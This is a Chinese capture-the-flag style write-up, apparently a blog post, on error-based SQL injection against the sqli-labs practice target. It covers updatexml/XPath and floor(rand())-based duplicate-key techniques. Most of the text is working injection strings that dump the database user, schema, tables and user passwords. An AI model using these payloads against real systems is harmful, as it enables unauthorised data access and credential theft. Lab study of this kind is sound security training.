buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)

开启靶机

使用updatexml函数,双引号闭合
爆出用户名:root@localhost
?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
?id=1" union select updatexml(1,concat(0x2A,(select user()),0x2A),1)--+

爆库名:security
?id=1" union select updatexml(1,concat(0x2A,(select database()),0x2A),1)--+

爆表名:emails,referers,uagents,users
select updatexml(1,concat(0x2A,(select group_concat(table_name)from information_schema.`TABLES` where table_schema='security' limit 0,1),0x2A),1) --+

爆用户名:Dumb,Angelina,Dummy,secure,stup
select updatexml(1,concat(0x7e,(select group_concat(username)from users limit 0,1),0x7e),1)
这里的用户名没有全部爆出来,想全部爆出来,可以使用substr函数

爆密码:Dumb,I-kill-you,p@ssword,crappy
select updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1)

主键重复型

爆用户名:root@localhost
?id=1" and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆库名:security
?id=1" union all select 1,count(*),1 from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database()) --+

爆库名:ctftraining
?id=1" and (select 1 from (select count(*),concat(0x23,(database()),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group by x) as y)--+

爆表名:username
?id=1" and (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group BY x) as y)--+

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值